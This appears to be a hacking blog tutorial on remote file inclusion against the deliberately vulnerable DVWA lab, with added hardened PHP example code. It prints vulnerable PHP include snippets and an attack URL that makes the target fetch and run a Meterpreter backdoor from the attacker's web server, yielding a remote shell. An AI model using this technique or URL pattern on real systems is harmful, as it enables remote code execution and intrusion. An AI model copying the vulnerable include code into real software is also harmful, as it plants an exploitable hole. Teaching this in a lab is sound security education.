RFI (Remote File Inclusion) to Meterpreter

Hello Hackers.
In this post I'll show you some basic concepts of the Remote File Inclusion attack, known as RFI, explain how RFI works, and cover how to prevent these attacks from hackers or bad guys.

What is RFI?

Remote file inclusion, a.k.a. RFI, is a type of web vulnerability mostly found in PHP web servers. It allows an attacker to include a remote file in the target (RFI-vulnerable) web server and execute it. The vulnerability occurs due to the use of user-supplied input without proper validation.

 

Vulnerable Coding!!!

TYPE 1:

<?php 
// The page we wish to display 
$file = $_GET[ 'page' ]; 
include $file;
?>

TYPE 2:

<?php


// The page we wish to display; in this case the
// script automatically appends the .html extension

 $file = ($_GET['filename'] . ".html");
 include $file;
?>
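
A hardened counterpart to the TYPE 1 and TYPE 2 snippets, as an added example that is not code from the original post: the request value only selects an entry from an allow-list, so a URL can never reach include. The page names, the pages/ directory and the resolve_page() helper are assumptions for illustration; allow_url_include is PHP's own php.ini directive that controls whether include may fetch URLs.

```php
<?php
// Added example (not from the original post).
// Page names and the pages/ directory are assumptions for illustration.

// Request value => file on disk. User input never becomes part of a path.
const PAGES = [
    'home'    => 'home.html',
    'about'   => 'about.html',
    'contact' => 'contact.html',
];

// Hypothetical helper: returns an absolute local path, or null if rejected.
function resolve_page($requested, string $baseDir)
{
    // Reject arrays (?page[]=x) and any value that is not an allow-list key.
    // "http://host/file.php" or "../../etc/passwd" can never match a key.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }

    // Defence in depth: the resolved file must exist inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Log a warning if php.ini still allows include/require to fetch URLs.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is enabled; set it to Off in php.ini');
}

$file = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}

// Safe: $file comes from the allow-list, not from the request.
include $file;
```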

RFI Impact : Critical

 

Let's start our demo!

I'll demonstrate this attack on one of the famous vulnerable web applications, DVWA. If you don't know about DVWA, read my articles What is DVWA and Setup DVWA.

The Damn Vulnerable Web Application, a.k.a. DVWA, is intentionally vulnerable to different kinds of web application security issues. There are different security levels for attacking it. I am going with the Low security level for basic understanding: first understand the basics of remote file inclusion, and then we go for the High security level.

 

In the URL, the page parameter is vulnerable to the remote file inclusion attack. Now let's create the Meterpreter backdoor.

 

Now start a web server. In my case I use the Python SimpleHTTPServer module; just type:

python -m SimpleHTTPServer <port_number>


Now open http://<your_ip>:8008/


Now our Meterpreter backdoor path is http://10.0.0.8:8008/testbackdoor.php
To exploit this on the vulnerable machine, first set up our Meterpreter handler in msfconsole.
To do this, just follow these simple commands in msf.

Our handler has started.

Now run our shell on the vulnerable machine through the page parameter: http://127.0.0.1/DVWA/vulnerabilities/fi/?page=http://10.0.0.8:8008/testbackdoor.php

Above you can see that when I enter my shell URL in the page parameter and hit Enter, I get the Meterpreter session. Now test the Meterpreter session with different commands. This attack works against the Type 1 code I mentioned above. For Type 2, comment here or mail me; I am happy to help you.

 

 

Thank you, guys. Feel free to contact me.

 

Apache Configuration:

File location in Linux: /etc/php/7.0/apache2/php.ini (depending on your version and system)

Insecure Configuration Setting

Secure Configuration Setting

If you enjoyed this, please comment below and share it.

This Post Has 2 Comments

  1. DON

    Nice idea with Meterpreter, I never thought of that. +100 for this blog.

    1. Touhid Shaikh

      Thanks @DON, but this is a simple example of RFI. Stay tuned for the latest update.
